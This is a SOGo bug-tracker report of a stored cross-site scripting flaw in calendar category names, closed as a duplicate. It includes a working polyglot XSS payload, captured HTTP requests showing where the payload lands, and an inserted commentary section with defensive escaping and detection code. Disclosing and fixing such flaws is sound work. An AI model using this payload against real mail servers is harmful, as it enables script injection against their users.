View Issue Details

ID: 0006006
Project: SOGo
Category: Web Calendar
View Status: public
Last Update: 2024-09-12 06:58
Reporter: julian123
Assigned To: qhivert
Priority: normal
Severity: minor
Reproducibility: always
Status: closed
Resolution: duplicate
Platform: [Server] Linux
OS: Ubuntu
OS Version: 16.04 LTS
Product Version: 5.10.0
Summary: 0006006: Calendar Categories Stored-XSS
Description

A cross-site scripting payload can be stored in the Calendar category fields, leading to execution when the user navigates to their inbox.

Steps To Reproduce
  1. Authenticate to the application.
  2. Navigate to Preferences > Calendar > Categories
  3. Edit an existing category or add a new category, placing the following payload in the form field:
    //</stYle/</titLe/</teXtarEa/</scRipt/--!>\\x3csVg/<sVg/oNloAd=alert(1)//>\\x3e
  4. Select Save
  5. Navigate to the user's inbox and observe the XSS payload execute.
Additional Information

POST /SOGo/so/john@123.com/Preferences/save HTTP/1.1
Host: 192.168.2.96
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:129.0) Gecko/20100101 Firefox/129.0
Accept: application/json, text/plain, */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Referer: http://192.168.2.96/
Content-Type: application/json;charset=utf-8
X-XSRF-TOKEN: ac1a2fd18ca6a5119b777957e01d6f71148f1317
Content-Length: 3866
Origin: http://192.168.2.96
DNT: 1
Sec-GPC: 1
Connection: keep-alive
Cookie: 0xHIGHFLYxSOGo=

...snip...
},"defaults":{"SOGoCalendarCategoriesColors":{"Customer":"#F8D800","Calls":"#0396FF","Favorites":"#EA5455","Meeting":"#7367F0","Ideas":"#32CCBC","Miscellaneous":"#F6416C","Birthday":"#28C76F","Anniversary":"#9F44D3","Vacation":"#623AA2","Travel":"#F55555","Projects":"#8C1BAB","Suppliers":"#9708CC","Gifts":"#736EFE","Clients":"#E96D71","Issues":"#3677FF","Business":"#FA016D","Holidays":"#0E197D","Personal":"#DE4313","Status":"0002661","Competition":"#6018DC","Follow up":"#D939CD","//</stYle/</titLe/</teXtarEa/</scRipt/--!>\\x3csVg/<sVg/oNloAd=alert(1112)//>\\x3e":"#E80505"

GET /SOGo/so/john@123.com/Preferences HTTP/1.1
Host: 192.168.2.96
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:129.0) Gecko/20100101 Firefox/129.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/png,image/svg+xml,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
DNT: 1
Sec-GPC: 1
Connection: keep-alive
...snip...
<script id="UserDefaults" type="text/json">
{"SOGoCalendarCategoriesColors":{"//</stYle/</titLe/</teXtarEa/</scRipt/--!>\\x3csVg/<sVg/oNloAd=alert(1112)//>\\x3e":"
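The `UserDefaults` block above is the sink: the preferences JSON is written straight into a `<script type="text/json">` element, and the HTML parser ends a script element at the first `</script` it meets regardless of JSON string quoting. The following is an added example, not SOGo's code, of serialising such a block so that a hostile category name cannot close the element, plus a check a reviewer can run over rendered markup; `jsonForScriptTag`, `renderUserDefaults` and the sample category data are assumptions constructed for the example.

```javascript
// Serialise data for embedding inside <script type="text/json"> ... </script>.
// JSON.stringify escapes only quotes, backslashes and control characters, so
// '<', '>' and '&' would reach the page literally. Escaping them as \uXXXX
// keeps the payload valid JSON (JSON.parse restores the original characters)
// while guaranteeing the body can never contain "</script" or any other tag.
// U+2028/U+2029 are escaped too, since they end lines in pre-ES2019 JavaScript.
function jsonForScriptTag(value) {
  return JSON.stringify(value).replace(/[<>&\u2028\u2029]/g, (ch) =>
    "\\u" + ch.charCodeAt(0).toString(16).padStart(4, "0"));
}

// Hardened rendering of the UserDefaults block (hypothetical template helper).
function renderUserDefaults(defaults) {
  return '<script id="UserDefaults" type="text/json">' +
    jsonForScriptTag(defaults) + "</script>";
}

// Unsafe variant for comparison: raw JSON.stringify output, as in the report.
function renderUserDefaultsUnsafe(defaults) {
  return '<script id="UserDefaults" type="text/json">' +
    JSON.stringify(defaults) + "</script>";
}

// Extract the JSON body between the opening tag and the final closing tag.
function scriptBody(html) {
  return html.slice(html.indexOf(">") + 1, html.lastIndexOf("</script>"));
}

// Detection check: does the body contain a sequence that would terminate the
// element or open a new one before the intended </script>?
function breaksOutOfScript(html) {
  return /<\/script|<svg|<\/style|<\/textarea/i.test(scriptBody(html));
}

// Does the hardened encoding still round-trip to the original object?
function roundTrips(defaults) {
  const parsed = JSON.parse(scriptBody(renderUserDefaults(defaults)));
  return JSON.stringify(parsed) === JSON.stringify(defaults);
}

// Constructed sample: one benign category and one category name that tries to
// close the script element (shape mirrors SOGoCalendarCategoriesColors).
const sampleDefaults = {
  SOGoCalendarCategoriesColors: {
    Meeting: "#7367F0",
    "</script><svg onload=alert(1)>": "#E80505",
  },
};
```

The same rule applies to any JSON a server template writes into an inline script: escape `<`, `>` and `&` at serialisation time rather than relying on the client to sanitise category names later.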

Tags: calender

Relationships

related to 0006010 (closed, qhivert): Stored-XSS in Reply to Email
related to 0006004 (assigned, qhivert): Stored-XSS in Contacts Category Fields

Activities

There are no notes attached to this issue.

Issue History

Date Modified Username Field Change
2024-08-19 23:57 julian123 New Issue
2024-08-19 23:57 julian123 Tag Attached: calender
2024-08-20 14:08 qhivert Relationship added related to 0006010
2024-08-20 14:08 qhivert Relationship added related to 0006004
2024-09-12 06:58 qhivert Assigned To => qhivert
2024-09-12 06:58 qhivert Status new => closed
2024-09-12 06:58 qhivert Resolution open => duplicate